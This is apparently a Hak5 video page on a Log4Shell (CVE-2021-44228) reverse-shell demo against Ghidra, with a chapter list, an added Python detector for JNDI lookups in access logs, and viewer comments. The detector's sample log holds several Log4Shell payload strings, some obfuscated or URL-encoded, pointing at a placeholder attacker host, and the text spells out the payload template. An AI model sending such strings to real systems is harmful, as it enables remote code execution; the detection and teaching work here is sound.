How Hackers Exploit Log4J to Get a Reverse Shell (Ghidra Log4Shell Demo) | HakByte

On this episode of HakByte, @AlexLynd demonstrates a Log4Shell attack against Ghidra and shows how a reverse shell can be established on a compromised system running a vulnerable version of the Log4j Java logging library.
Log4j is embedded in millions of Java-powered applications and devices, and the recently disclosed vulnerability (Log4Shell, CVE-2021-44228) lets an attacker compromise a vulnerable system with a single crafted string that the application merely has to log.

Chapters:
Intro @AlexLynd 00:00
What is Log4J? 00:16
Log4Shell Exploit Explained 00:40
Vulnerable Programs 01:11
Set up the Log4Shell Demo 02:33
Create a Webserver 03:11
Netcat Reverse Shell Listener 04:01
Set up Log4Shell Demo 05:01
Log4Shell String Explained 05:45
Ghidra Setup 06:24
Log4Shell Attack Demo 07:01
Netcat Reverse Shell 07:39
Outro 08:00
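The string the video walks through in "Log4Shell String Explained" is a Log4j 2 lookup of the form `${jndi:ldap://attacker-host:port/path}`; when a vulnerable Log4j 2 (2.0-beta9 through 2.14.1) logs it, the library performs the JNDI lookup and can end up loading attacker-supplied code. A commenter below asks how to spot this in a log file, which is harder than grepping for `${jndi:` because attackers nest lookups and URL-encode the payload. The following is an added detection example, not code from the video, from Hak5 or from the Log4j project; it normalises constructed access-log lines (addresses, paths and timestamps are made up) and reports every JNDI lookup, including obfuscated and URL-encoded variants.

```python
import re
import urllib.parse
from typing import Dict, List, Tuple

# Log4Shell (CVE-2021-44228) fires when Log4j 2 (2.0-beta9 to 2.14.1) logs a
# string containing a JNDI lookup, ${jndi:<scheme>://host[:port]/path}.
# Attackers hide the "jndi" token behind nested lookups that resolve to a
# literal (${lower:j}, ${::-j}, ${env:UNSET:-j}) and behind URL-encoding, so
# a naive grep for "${jndi:" misses much real traffic. This detector
# normalises each line first, then matches the canonical form.

# Innermost ${lower:X} / ${upper:X} lookups: they resolve to X re-cased.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# Innermost ${key:-default} lookups whose key is not "jndi": in an attack
# the key is chosen to be unresolvable, so Log4j substitutes the default.
_DEFAULT = re.compile(r"\$\{(?!jndi:)[^${}]*:-([^${}]*)\}", re.IGNORECASE)
# The canonical, de-obfuscated lookup we ultimately want to find.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^}]*)\}", re.IGNORECASE)


def normalise(line: str) -> str:
    """Undo URL-encoding and collapse nested literal lookups, inside out."""
    s = line
    for _ in range(3):                      # handles double/triple encoding
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    while True:
        reduced = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
            else m.group(2).upper(), s)
        reduced = _DEFAULT.sub(lambda m: m.group(1), reduced)
        if reduced == s:                    # no more nested lookups to fold
            return s
        s = reduced


def find_jndi_lookups(line: str) -> List[Dict[str, str]]:
    """Return every JNDI lookup in one log line after normalisation."""
    return [{"scheme": m.group(1).lower(), "target": m.group(2).strip()}
            for m in _JNDI.finditer(normalise(line))]


def scan(lines: List[str]) -> List[Tuple[int, str, str]]:
    """(line number, scheme, target) for every hit in a list of log lines."""
    hits = []
    for n, line in enumerate(lines, 1):
        for hit in find_jndi_lookups(line):
            hits.append((n, hit["scheme"], hit["target"]))
    return hits


# Constructed access-log lines (addresses, paths and times are made up) in
# which the payload arrives in the User-Agent or the query string, the two
# fields most web apps log verbatim.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [11/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [11/Dec/2021:10:01:12 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F203.0.113.10%3A1099%2Fb%7D HTTP/1.1" 404 "curl/7.79"',
    '10.0.0.9 - - [11/Dec/2021:10:01:15 +0000] "GET / HTTP/1.1" 200 "${${env:UNSET:-j}ndi:dns://203.0.113.10/c}"',
    '10.0.0.7 - - [11/Dec/2021:10:02:00 +0000] "GET /price?total=${amount} HTTP/1.1" 200 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, scheme, target in scan(SAMPLE_LOG):
        print(f"line {n}: jndi lookup via {scheme} -> {target}")
```

Treat this as a triage filter, not proof of compromise or of safety: the benign `${amount}` on the last line is correctly ignored, but a real Log4j resolves `${env:NAME:-x}` to the variable's value when NAME is set, other lookups (`sys:`, `date:`) can be abused the same way, and the payload only shows up in a log file if the application logs the field it arrived in. The fix is still to upgrade Log4j (2.17.1 or later on Java 8 and above) rather than to rely on spotting the string.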

Hak5 -- Cyber Security Education, Inspiration, News & Community since 2005:

Founded in 2005, Hak5's mission is to advance the InfoSec industry. We do this through our award winning educational podcasts, leading pentest gear, and inclusive community – where all hackers belong.
Comments

I don't know what surprises me the most, the vulnerability itself, being that easy to explore, or how long it was unknown by the industry and community

cronus

“It ain’t gonna be that easy”


*“It’s that easy.”*

YISTECH

What's scary is that this RCE is so incredibly easy to do, and it's attacking something that is so widely used, you just know people had to have been using it for years without people knowing it! This kind of RCE is literally a once in a decade kind of find. Log4J is run on so many things, it is impossible that they will all get patched, so this RCE will be valid for a long time to come.

bluegizmo

That was an amazing, easy-to-follow video. Congrats!

Ronoaldo

Been dealing with this all week at work. It's an easy enough fix, but it's just a pita to do all of them manually till they patch it in software.

natewesselink

What companies allow access to unknown LDAP/LDAPS servers through their firewalls? This is the biggest security risk.

KangoV

I can't wait to explore this in my own home lab. It's insane how easy this exploit is and how prevalent this vulnerable application is.

npz

Great and timely video! I'm seeing a lot of problems relating to the updates. More accurately, the same problem with the same update from different users.

jmr

I could be mistaken but this looks like Oracle, who makes Java, failed to do input validation. Which is supposed to be a kind of security standard.

jonathanmcneill

I don't know how to thank you for this explanation. It was really hard to get what's going on, mostly at work where everyone is freaking out over this; now I have a more realistic understanding of the dangers of this CVE...
Thanks a lot!

aguadecanilla

So you're telling me log4j downloads unknown code from any LDAP server and executes it... why would they do that ?!

mehdiarmachi

I like the last statement. “Crimes are illegal” 😛

deathcoder

At the zoom in, Lynd should have said "because crimes are illegal" and wink with that "ding" sound you hear when the answer is right.

russell

Thank you so much Alex, this topic is my project and my gate pass to be part of the cyber security team. I'm supposed to report on and replicate the Log4j attack but had no luck replicating it using Minecraft, but this definitely is the easiest and safest way. Thank you, you just saved my career. God bless.

TamTam-tgtd

Nice video demo Alex. It would be cool if a line or two were dedicated to seeing what shows up in the logfile (assuming that your logfile will not be destroyed by the exploit).
Detecting this in the logfile is not so straightforward (depending on the application).

robvercouteren

Great tutorial Alex! The volume of vlog sounded a little low though.

juliusrowe

Needed this video 'cause the Hack The Box walkthrough for Archetype was too big brain to understand well.

alexandernguyen-phuoc

Really strange design decision for a logger, it must be a well-designed backdoor.

skepticalmind

I am curious what other triggers/codes are needed for this Ghidra server to be vulnerable. I notice that Qualys only marks the log4j-core and log4j-api libraries; if a deployment only includes a plain jar of log4j, Qualys will ignore it no matter the version.

YuanLiuTheDoc

Great explanation. Good video. Spidey approves

skerfreak